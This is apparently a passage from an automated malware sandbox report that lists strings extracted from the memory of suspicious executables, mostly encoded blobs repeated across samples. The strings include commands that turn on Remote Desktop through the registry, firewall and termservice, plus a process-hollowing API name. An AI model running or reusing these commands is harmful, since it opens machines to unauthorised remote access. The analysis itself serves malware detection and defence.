S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: random.exe, 00000000.00000003.2129436931.000000000163D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: random.exe, 00000000.00000003.2129436931.000000000163D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000001.00000002.2134468075.0000000000B81000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000001.00000002.2134468075.0000000000B81000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000001.00000000.2132161200.0000000000B81000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000001.00000000.2132161200.0000000000B81000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000002.00000002.4580287016.0000000000B81000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000002.00000002.4580287016.0000000000B81000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000002.00000000.2141742608.0000000000B81000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000002.00000000.2141742608.0000000000B81000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: 186adf2617.exe, 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: 186adf2617.exe, 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM 